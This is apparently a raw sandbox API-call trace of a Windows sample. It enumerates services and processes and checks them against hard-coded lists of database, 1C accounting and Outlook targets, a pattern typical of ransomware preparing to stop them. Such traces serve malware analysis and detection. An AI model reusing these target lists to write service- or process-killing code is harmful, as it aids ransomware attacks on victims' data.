	[0160.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0160.885] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0160.885] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0160.885] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0160.885] lstrlenW (lpString="Netman") returned 6
	[0160.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0160.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0160.885] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0160.885] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0160.885] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0160.885] lstrlenW (lpString="netprofm") returned 8
	[0160.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0160.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0160.885] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0160.885] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0160.885] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0160.885] lstrlenW (lpString="NlaSvc") returned 6
	[0160.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0160.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0160.885] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0160.885] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0160.885] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0160.885] lstrlenW (lpString="nsi") returned 3
	[0160.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0160.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0160.885] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0160.885] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0160.885] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0160.885] lstrlenW (lpString="PcaSvc") returned 6
	[0160.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0160.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0160.886] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0160.886] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0160.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0160.886] lstrlenW (lpString="PlugPlay") returned 8
	[0160.886] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0160.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0160.886] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0160.886] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0160.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0160.886] lstrlenW (lpString="Power") returned 5
	[0160.886] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0160.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0160.886] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0160.886] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0160.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0160.886] lstrlenW (lpString="ProfSvc") returned 7
	[0160.886] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0160.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0160.886] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0160.886] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0160.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0160.886] lstrlenW (lpString="RpcEptMapper") returned 12
	[0160.886] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0160.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0160.886] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0160.886] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0160.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0160.886] lstrlenW (lpString="RpcSs") returned 5
	[0160.886] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0160.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0160.886] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0160.887] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0160.887] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0160.887] lstrlenW (lpString="SamSs") returned 5
	[0160.887] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0160.887] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0160.887] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0160.887] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0160.887] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0160.887] lstrlenW (lpString="Schedule") returned 8
	[0160.887] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0160.887] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0160.887] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0160.887] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0160.887] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0160.887] lstrlenW (lpString="SENS") returned 4
	[0160.887] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0160.887] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0160.887] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0160.887] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0160.887] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0160.887] lstrlenW (lpString="ShellHWDetection") returned 16
	[0160.887] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0160.887] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0160.887] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0160.887] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0160.887] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0160.887] lstrlenW (lpString="Spooler") returned 7
	[0160.887] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0160.887] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0160.887] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0160.887] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0160.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0160.888] lstrlenW (lpString="SysMain") returned 7
	[0160.888] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0160.888] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0160.888] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0160.888] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0160.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0160.888] lstrlenW (lpString="Themes") returned 6
	[0160.888] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0160.888] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0160.888] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0160.888] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0160.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0160.888] lstrlenW (lpString="TrkWks") returned 6
	[0160.888] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0160.888] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0160.888] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0160.888] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0160.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0160.888] lstrlenW (lpString="UxSms") returned 5
	[0160.888] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0160.888] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0160.888] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0160.888] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0160.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0160.888] lstrlenW (lpString="WdiServiceHost") returned 14
	[0160.888] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0160.888] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0160.888] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0160.888] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0160.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0160.889] lstrlenW (lpString="WdiSystemHost") returned 13
	[0160.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0160.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0160.889] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0160.889] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0160.889] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0160.889] lstrlenW (lpString="Winmgmt") returned 7
	[0160.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0160.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0160.889] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0160.889] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0160.889] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0160.889] lstrlenW (lpString="WPDBusEnum") returned 10
	[0160.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0160.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0160.889] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0160.889] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0160.889] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0160.889] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7ba6360 | out: hHeap=0x7ab0000) returned 1
	[0160.889] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x388
	[0160.891] Process32FirstW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0160.891] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0160.892] lstrlenW (lpString="System") returned 6
	[0160.892] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0160.892] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0160.892] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0160.892] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0160.892] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0160.892] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0160.892] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0160.892] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0160.892] lstrlenW (lpString="smss.exe") returned 8
	[0160.892] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0160.892] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0160.892] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0160.892] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0160.892] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0160.892] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0160.893] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0160.893] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0160.893] lstrlenW (lpString="csrss.exe") returned 9
	[0160.893] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0160.893] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0160.893] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0160.893] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0160.893] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0160.893] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0160.893] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0160.893] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0160.893] lstrlenW (lpString="wininit.exe") returned 11
	[0160.893] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0160.893] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0160.893] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0160.893] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0160.894] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0160.894] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0160.894] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0160.894] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0160.894] lstrlenW (lpString="csrss.exe") returned 9
	[0160.894] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0160.894] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0160.894] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0160.894] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0160.894] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0160.894] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0160.894] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0160.894] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0160.894] lstrlenW (lpString="winlogon.exe") returned 12
	[0160.894] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0160.894] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0160.895] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0160.895] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0160.895] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0160.895] lstrlenW (lpString="services.exe") returned 12
	[0160.895] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0160.895] lstrlenW (lpString="lsass.exe") returned 9
	[0160.895] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0160.896] lstrlenW (lpString="lsm.exe") returned 7
	[0160.896] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0160.896] lstrlenW (lpString="svchost.exe") returned 11
	[0160.896] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0160.896] lstrlenW (lpString="svchost.exe") returned 11
	[0160.896] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0160.897] lstrlenW (lpString="svchost.exe") returned 11
	[0160.897] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0160.897] lstrlenW (lpString="svchost.exe") returned 11
	[0160.897] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0160.897] lstrlenW (lpString="svchost.exe") returned 11
	[0160.897] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0160.898] lstrlenW (lpString="audiodg.exe") returned 11
	[0160.898] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0160.898] lstrlenW (lpString="svchost.exe") returned 11
	[0160.898] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0160.898] lstrlenW (lpString="svchost.exe") returned 11
	[0160.898] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0160.898] lstrlenW (lpString="spoolsv.exe") returned 11
	[0160.899] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0160.899] lstrlenW (lpString="svchost.exe") returned 11
	[0160.899] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0160.899] lstrlenW (lpString="taskhost.exe") returned 12
	[0160.899] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0160.899] lstrlenW (lpString="userinit.exe") returned 12
	[0160.899] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0160.900] lstrlenW (lpString="dwm.exe") returned 7
	[0160.900] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0160.900] lstrlenW (lpString="explorer.exe") returned 12
	[0160.900] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0160.900] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0160.900] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0160.901] lstrlenW (lpString="reader_sl.exe") returned 13
	[0160.901] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="drvinst.exe")) returned 1
	[0160.901] lstrlenW (lpString="drvinst.exe") returned 11
	[0160.901] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0160.901] lstrlenW (lpString="taskhost.exe") returned 12
	[0160.901] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 0
	[0160.902] CloseHandle (hObject=0x388) returned 1
	[0160.902] Sleep (dwMilliseconds=0x1f4) 
	[0161.752] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616c60
	[0161.752] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0161.753] GetLastError () returned 0xea
	[0161.753] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x113e) returned 0x7ba6360
	[0161.753] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7ba6360, cbBufSize=0x113e, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7ba6360, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
